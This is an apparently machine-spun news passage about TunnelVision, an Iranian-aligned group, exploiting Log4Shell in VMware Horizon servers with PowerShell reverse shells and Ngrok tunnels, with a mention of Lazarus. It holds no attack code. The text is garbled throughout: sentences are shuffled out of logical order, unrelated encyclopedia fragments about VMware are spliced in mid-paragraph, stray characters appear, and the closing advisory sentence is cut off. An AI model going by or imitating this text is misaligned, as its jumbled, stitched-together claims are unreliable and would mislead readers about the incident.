The bug bit the Internet’s biggest players and was widely targeted in the wild after it became known. CVE-2021-44228 (or Log4Shell, as the vulnerability is tracked or nicknamed) allows attackers to easily gain remote control over computers running apps in the Java programming language. Recently, SentinelOne reported, TunnelVision has started exploiting a critical vulnerability in Log4j, an open source logging utility that’s integrated into thousands of apps. Vulnerabilities in Fortinet FortiOS (CVE-2018-13379) and Microsoft Exchange (ProxyShell) are two of the group’s better-known targets. In the past, TunnelVision has exploited so-called 1-day vulnerabilities-meaning vulnerabilities that have been recently patched-to hack organizations that have yet to install the fix. The name is meant to emphasize TunnelVision’s heavy reliance on tunneling tools and the unique way it deploys them. Security firm SentinelOne has dubbed the group TunnelVision. The cybersecurity company said it’s associating the attacks to a separate Iranian cluster not because they are unrelated, but owing to the fact that “there is at present insufficient data to treat them as identical to any of the aforementioned attributions.Hackers aligned with the government of Iran are exploiting the critical Log4j vulnerability to infect unpatched VMware users with ransomware, researchers said on Thursday. self-published sourceVMwares desktop software runs on Microsoft Windows, Linux, and macOS.
VMware was the first commercially successful company to virtualize the x86 architecture. SentinelOne also said it identified similarities in the mechanism used to execute the reverse web shell with another PowerShell-based implant called PowerLess that was disclosed by Cybereason researchers earlier this month.Īll through the activity, the threat actor is said to have utilized a GitHub repository known as “VmWareHorizon” under the username “protections20” to host the malicious payloads. is an American cloud computing and virtualization technology company with headquarters in Palo Alto, California. The PowerShell commands are used as a launchpad to download tools like Ngrok and run further commands by means of reverse shells that are employed to drop a PowerShell backdoor that’s capable of gathering credentials and executing reconnaissance commands. Additionally, Lazarus, a North Korean state-sponsored threat actor, is exploiting Log4Shell as an initial attack vector against VMWare Horizon servers. All internal and external Horizon components including Connection Server, Agent, Cloud Connector and UAG must address the log4j vulnerabilities in an urgent.
0 kommentar(er)
